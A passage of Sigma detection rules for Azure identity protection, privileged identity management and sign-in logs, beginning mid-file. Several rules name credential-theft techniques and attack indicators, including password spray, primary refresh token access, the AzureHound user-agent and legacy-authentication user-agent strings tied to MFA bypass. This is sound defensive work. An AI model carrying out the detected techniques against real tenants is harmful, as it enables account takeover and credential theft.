location. 
references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow' date: 2023-08-07 tags: - attack.t1528 - attack.credential-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'anomalousToken' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml ================================================ title: Anomalous User Activity id: 258b6593-215d-4a26-a141-c8e31c1299a6 status: test description: Indicates that there are anomalous patterns of behavior like suspicious changes to the directory. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.privilege-escalation - attack.t1098 - attack.persistence logsource: product: azure service: riskdetection detection: selection: riskEventType: 'anomalousUserActivity' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. 
level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml ================================================ title: Activity From Anonymous IP Address id: be4d9c86-d702-4030-b52e-c7859110e5e8 status: test description: Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1078 - attack.persistence - attack.defense-evasion - attack.privilege-escalation - attack.initial-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'riskyIPAddress' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml ================================================ title: Anonymous IP Address id: 53acd925-2003-440d-a1f3-71a5253fe237 status: test description: Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN. 
references: - https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0 - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address author: Gloria Lee, '@gleeiamglo' date: 2023-08-22 tags: - attack.t1528 - attack.credential-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'anonymizedIPAddress' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml ================================================ title: Atypical Travel id: 1a41023f-1e70-4026-921a-4d9341a9038e status: test description: Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1078 - attack.persistence - attack.defense-evasion - attack.privilege-escalation - attack.initial-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'unlikelyTravel' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. 
level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml ================================================ title: Impossible Travel id: b2572bf9-e20a-4594-b528-40bde666525a status: test description: Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1078 - attack.persistence - attack.defense-evasion - attack.privilege-escalation - attack.initial-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'impossibleTravel' condition: selection falsepositives: - Connecting to a VPN, performing activity and then dropping and performing additional activity. 
level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml ================================================ title: Suspicious Inbox Forwarding Identity Protection id: 27e4f1d6-ae72-4ea0-8a67-77a73a289c3d status: test description: Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1114.003 - attack.collection logsource: product: azure service: riskdetection detection: selection: riskEventType: 'suspiciousInboxForwarding' condition: selection falsepositives: - A legitimate forwarding rule. level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml ================================================ title: Suspicious Inbox Manipulation Rules id: ceb55fd0-726e-4656-bf4e-b585b7f7d572 status: test description: Detects when suspicious rules that delete or move messages or folders are set on a user's inbox. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1140 - attack.defense-evasion logsource: product: azure service: riskdetection detection: selection: riskEventType: 'mcasSuspiciousInboxManipulationRules' condition: selection falsepositives: - Actual mailbox rules that are moving items based on their workflow. 
level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml ================================================ title: Azure AD Account Credential Leaked id: 19128e5e-4743-48dc-bd97-52e5775af817 status: test description: Indicates that the user's valid credentials have been leaked. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1589 - attack.reconnaissance logsource: product: azure service: riskdetection detection: selection: riskEventType: 'leakedCredentials' condition: selection falsepositives: - A rare hash collision. level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml ================================================ title: Malicious IP Address Sign-In Failure Rate id: a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd status: test description: Indicates sign-in from a malicious IP address based on high failure rates. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-07 tags: - attack.t1090 - attack.command-and-control logsource: product: azure service: riskdetection detection: selection: riskEventType: 'maliciousIPAddress' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. 
level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml ================================================ title: Malicious IP Address Sign-In Suspicious id: 36440e1c-5c22-467a-889b-593e66498472 status: test description: Indicates sign-in from a malicious IP address known to be malicious at time of sign-in. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-07 tags: - attack.t1090 - attack.command-and-control logsource: product: azure service: riskdetection detection: selection: riskEventType: 'suspiciousIPAddress' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml ================================================ title: Sign-In From Malware Infected IP id: 821b4dc3-1295-41e7-b157-39ab212dd6bd status: test description: Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server. 
references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1090 - attack.command-and-control logsource: product: azure service: riskdetection detection: selection: riskEventType: 'malwareInfectedIPAddress' condition: selection falsepositives: - Using an IP address that is shared by many users level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml ================================================ title: New Country id: adf9f4d2-559e-4f5c-95be-c28dff0b1476 status: test description: Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1078 - attack.persistence - attack.defense-evasion - attack.privilege-escalation - attack.initial-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'newCountry' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. 
level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml ================================================ title: Password Spray Activity id: 28ecba0a-c743-4690-ad29-9a8f6f25a6f9 status: test description: Indicates that a password spray attack has been successfully performed. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1110 - attack.credential-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'passwordSpray' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml ================================================ title: Primary Refresh Token Access Attempt id: a84fc3b1-c9ce-4125-8e74-bdcdb24021f1 status: test description: Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-07 tags: - attack.t1528 - attack.credential-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'attemptedPrtAccess' condition: selection falsepositives: - This detection is low-volume and is seen 
infrequently in most organizations. When this detection appears it's high risk, and users should be remediated. level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml ================================================ title: Suspicious Browser Activity id: 944f6adb-7a99-4c69-80c1-b712579e93e6 status: test description: Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1078 - attack.persistence - attack.defense-evasion - attack.privilege-escalation - attack.initial-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'suspiciousBrowser' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml ================================================ title: Azure AD Threat Intelligence id: a2cb56ff-4f46-437a-a0fa-ffa4d1303cba status: test description: Indicates user activity that is unusual for the user or consistent with known attack patterns. 
references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-07 tags: - attack.t1078 - attack.persistence - attack.defense-evasion - attack.privilege-escalation - attack.initial-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'investigationsThreatIntelligence' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml ================================================ title: SAML Token Issuer Anomaly id: e3393cba-31f0-4207-831e-aef90ab17a8c status: test description: Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1606 - attack.credential-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'tokenIssuerAnomaly' condition: selection falsepositives: - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. 
level: high ================================================ FILE: rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml ================================================ title: Unfamiliar Sign-In Properties id: 128faeef-79dd-44ca-b43c-a9e236a60f49 status: test description: Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins. references: - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-03 tags: - attack.t1078 - attack.persistence - attack.defense-evasion - attack.privilege-escalation - attack.initial-access logsource: product: azure service: riskdetection detection: selection: riskEventType: 'unfamiliarFeatures' condition: selection falsepositives: - User changing to a new device, location, browser, etc. level: high ================================================ FILE: rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml ================================================ title: Stale Accounts In A Privileged Role id: e402c26a-267a-45bd-9615-bd9ceda6da85 status: test description: Identifies when an account hasn't signed in during the past n number of days. 
references: - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-14 tags: - attack.initial-access - attack.defense-evasion - attack.t1078 - attack.persistence - attack.privilege-escalation logsource: product: azure service: pim detection: selection: riskEventType: 'staleSignInAlertIncident' condition: selection falsepositives: - Investigate if potential generic account that cannot be removed. level: high ================================================ FILE: rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml ================================================ title: Invalid PIM License id: 58af08eb-f9e1-43c8-9805-3ad9b0482bd8 status: test description: Identifies when an organization doesn't have the proper license for PIM and is out of compliance. references: - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-14 tags: - attack.initial-access - attack.defense-evasion - attack.t1078 - attack.persistence - attack.privilege-escalation logsource: product: azure service: pim detection: selection: riskEventType: 'invalidLicenseAlertIncident' condition: selection falsepositives: - Investigate if licenses have expired. 
level: high ================================================ FILE: rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml ================================================ title: Roles Assigned Outside PIM id: b1bc08d1-8224-4758-a0e6-fbcfc98c73bb status: test description: Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack. references: - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-14 tags: - attack.initial-access - attack.defense-evasion - attack.t1078 - attack.persistence - attack.privilege-escalation logsource: product: azure service: pim detection: selection: riskEventType: 'rolesAssignedOutsidePrivilegedIdentityManagementAlertConfiguration' condition: selection falsepositives: - Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there. level: high ================================================ FILE: rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml ================================================ title: Roles Activated Too Frequently id: 645fd80d-6c07-435b-9e06-7bc1b5656cba status: test description: Identifies when the same privilege role has multiple activations by the same user. 
references: - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-14 tags: - attack.initial-access - attack.defense-evasion - attack.t1078 - attack.persistence - attack.privilege-escalation logsource: product: azure service: pim detection: selection: riskEventType: 'sequentialActivationRenewalsAlertIncident' condition: selection falsepositives: - Investigate where if active time period for a role is set too short. level: high ================================================ FILE: rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml ================================================ title: Roles Activation Doesn't Require MFA id: 94a66f46-5b64-46ce-80b2-75dcbe627cc0 status: test description: Identifies when a privilege role can be activated without performing mfa. references: - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-14 tags: - attack.initial-access - attack.defense-evasion - attack.t1078 - attack.persistence - attack.privilege-escalation logsource: product: azure service: pim detection: selection: riskEventType: 'noMfaOnRoleActivationAlertIncident' condition: selection falsepositives: - Investigate if user is performing MFA at sign-in. level: high ================================================ FILE: rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml ================================================ title: Roles Are Not Being Used id: 8c6ec464-4ae4-43ac-936a-291da66ed13d status: test description: Identifies when a user has been assigned a privilege role and are not using that role. 
references: - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-14 tags: - attack.initial-access - attack.defense-evasion - attack.t1078 - attack.persistence - attack.privilege-escalation logsource: product: azure service: pim detection: selection: riskEventType: 'redundantAssignmentAlertIncident' condition: selection falsepositives: - Investigate if potential generic account that cannot be removed. level: high ================================================ FILE: rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml ================================================ title: Too Many Global Admins id: 7bbc309f-e2b1-4eb1-8369-131a367d67d3 status: test description: Identifies an event where there are there are too many accounts assigned the Global Administrator role. references: - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' date: 2023-09-14 tags: - attack.initial-access - attack.defense-evasion - attack.t1078 - attack.persistence - attack.privilege-escalation logsource: product: azure service: pim detection: selection: riskEventType: 'tooManyGlobalAdminsAssignedToTenantAlertIncident' condition: selection falsepositives: - Investigate if threshold setting in PIM is too low. 
level: high ================================================ FILE: rules/cloud/azure/signin_logs/azure_account_lockout.yml ================================================ title: Account Lockout id: 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a status: test description: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts author: AlertIQ date: 2021-10-10 modified: 2022-12-25 tags: - attack.credential-access - attack.t1110 logsource: product: azure service: signinlogs detection: selection: ResultType: 50053 condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_auth_failure_increase.yml ================================================ title: Increased Failed Authentications Of Any Type id: e1d02b53-c03c-4948-b11d-4d00cca49d03 status: test description: Detects when sign-ins increased by 10% or greater. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1' date: 2022-08-11 tags: - attack.privilege-escalation - attack.persistence - attack.initial-access - attack.defense-evasion - attack.t1078 logsource: product: azure service: signinlogs detection: selection: Status: failure Count: "<10%" condition: selection falsepositives: - Unlikely level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_auth_sucess_increase.yml ================================================ title: Measurable Increase Of Successful Authentications id: 67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae status: test description: Detects when successful sign-ins increased by 10% or greater. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton date: 2022-08-11 modified: 2022-08-18 tags: - attack.privilege-escalation - attack.persistence - attack.initial-access - attack.defense-evasion - attack.t1078 logsource: product: azure service: signinlogs detection: selection: Status: Success Count: "<10%" condition: selection falsepositives: - Increase of users in the environment level: low ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_auth_to_important_apps_using_single_factor_auth.yml ================================================ title: Authentications To Important Apps Using Single Factor Authentication id: f272fb46-25f2-422c-b667-45837994980f status: test description: Detect when authentications to important application(s) only required single-factor authentication references: - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts author: MikeDuddington, '@dudders1' date: 2022-07-28 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1078 logsource: product: azure service: signinlogs detection: selection: Status: 'Success' AppId: 'Insert Application ID use OR for multiple' AuthenticationRequirement: 'singleFactorAuthentication' condition: selection falsepositives: - If this was approved by System Administrator. level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml ================================================ title: Successful Authentications From Countries You Do Not Operate Out Of id: 8c944ecb-6970-4541-8496-be554b8e2846 status: test description: Detect successful authentications from countries you do not operate out of. 
references: - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts author: MikeDuddington, '@dudders1' date: 2022-07-28 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.credential-access - attack.t1078.004 - attack.t1110 logsource: product: azure service: signinlogs detection: selection: Status: 'Success' filter: Location|contains: '' condition: selection and not filter falsepositives: - If this was approved by System Administrator. level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_azurehound_discovery.yml ================================================ title: Discovery Using AzureHound id: 35b781cc-1a08-4a5a-80af-42fd7c315c6b status: test description: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication. references: - https://github.com/BloodHoundAD/AzureHound author: Janantha Marasinghe date: 2022-11-27 tags: - attack.discovery - attack.t1087.004 - attack.t1526 logsource: product: azure service: signinlogs detection: selection: userAgent|contains: 'azurehound' ResultType: 0 condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_device_registration_or_join_without_mfa.yml ================================================ title: Device Registration or Join Without MFA id: 5afa454e-030c-4ab4-9253-a90aa7fcc581 status: test description: Monitor and alert for device registration or join events where MFA was not performed. 
references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy author: Michael Epping, '@mepples21' date: 2022-06-28 tags: - attack.privilege-escalation - attack.persistence - attack.initial-access - attack.defense-evasion - attack.t1078.004 logsource: product: azure service: signinlogs detection: selection: ResourceDisplayName: 'Device Registration Service' conditionalAccessStatus: 'success' filter_mfa: AuthenticationRequirement: 'multiFactorAuthentication' condition: selection and not filter_mfa falsepositives: - Unknown level: medium ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml ================================================ title: Failed Authentications From Countries You Do Not Operate Out Of id: 28870ae4-6a13-4616-bd1a-235a7fad7458 status: test description: Detect failed authentications from countries you do not operate out of. references: - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts author: MikeDuddington, '@dudders1' date: 2022-07-28 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.credential-access - attack.t1078.004 - attack.t1110 logsource: product: azure service: signinlogs detection: selection: Status: 'Success' selection1: Location|contains: '' condition: not selection and not selection1 falsepositives: - If this was approved by System Administrator. level: low ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_only_single_factor_auth_required.yml ================================================ title: Azure AD Only Single Factor Authentication Required id: 28eea407-28d7-4e42-b0be-575d5ba60b2c status: test description: Detect when users are authenticating without MFA being required. 
references: - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts author: MikeDuddington, '@dudders1' date: 2022-07-27 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.credential-access - attack.t1078.004 - attack.t1556.006 logsource: product: azure service: signinlogs detection: selection: Status: 'Success' AuthenticationRequirement: 'singleFactorAuthentication' condition: selection falsepositives: - If this was approved by System Administrator. level: low ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml ================================================ title: Suspicious SignIns From A Non Registered Device id: 572b12d4-9062-11ed-a1eb-0242ac120002 status: test description: Detects risky authentication from a non AD registered device without MFA being required. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in author: Harjot Singh, '@cyb3rjy0t' date: 2023-01-10 modified: 2025-07-02 tags: - attack.privilege-escalation - attack.persistence - attack.initial-access - attack.defense-evasion - attack.t1078 logsource: product: azure service: signinlogs detection: selection_main: Status: 'Success' AuthenticationRequirement: 'singleFactorAuthentication' RiskState: 'atRisk' selection_empty1: DeviceDetail.trusttype: '' selection_empty2: DeviceDetail.trusttype: null condition: selection_main and 1 of selection_empty* falsepositives: - Unknown level: high ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_noncompliant_devices.yml ================================================ title: Sign-ins from Non-Compliant Devices id: 4f77e1d7-3982-4ee0-8489-abf2d6b75284 status: test description: Monitor and alert for sign-ins where the device was 
non-compliant. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in author: Michael Epping, '@mepples21' date: 2022-06-28 tags: - attack.privilege-escalation - attack.persistence - attack.initial-access - attack.defense-evasion - attack.t1078.004 logsource: product: azure service: signinlogs detection: selection: DeviceDetail.isCompliant: 'false' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_unknown_devices.yml ================================================ title: Sign-ins by Unknown Devices id: 4d136857-6a1a-432a-82fc-5dd497ee5e7c status: test description: Monitor and alert for Sign-ins by unknown devices from non-Trusted locations. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in author: Michael Epping, '@mepples21' date: 2022-06-28 modified: 2022-10-05 tags: - attack.privilege-escalation - attack.persistence - attack.initial-access - attack.defense-evasion - attack.t1078.004 logsource: product: azure service: signinlogs detection: selection: AuthenticationRequirement: singleFactorAuthentication ResultType: 0 NetworkLocationDetails: '[]' DeviceDetail.deviceId: '' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml ================================================ title: Potential MFA Bypass Using Legacy Client Authentication id: 53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc status: test description: Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack. 
references: - https://web.archive.org/web/20230217071802/https://blooteem.com/march-2022 - https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/ author: Harjot Singh, '@cyb3rjy0t' date: 2023-03-20 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.initial-access - attack.credential-access - attack.t1078.004 - attack.t1110 logsource: product: azure service: signinlogs detection: selection: Status: 'Success' userAgent|contains: - 'BAV2ROPC' - 'CBAinPROD' - 'CBAinTAR' condition: selection falsepositives: - Known Legacy Accounts level: high ================================================ FILE: rules/cloud/azure/signin_logs/azure_app_device_code_authentication.yml ================================================ title: Application Using Device Code Authentication Flow id: 248649b7-d64f-46f0-9fb2-a52774166fb5 status: test description: | Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious. references: - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022-06-01 tags: - attack.t1078 - attack.defense-evasion - attack.persistence - attack.privilege-escalation - attack.initial-access logsource: product: azure service: signinlogs detection: selection: properties.message: Device Code condition: selection falsepositives: - Applications that are input constrained will need to use device code flow and are valid authentications. 
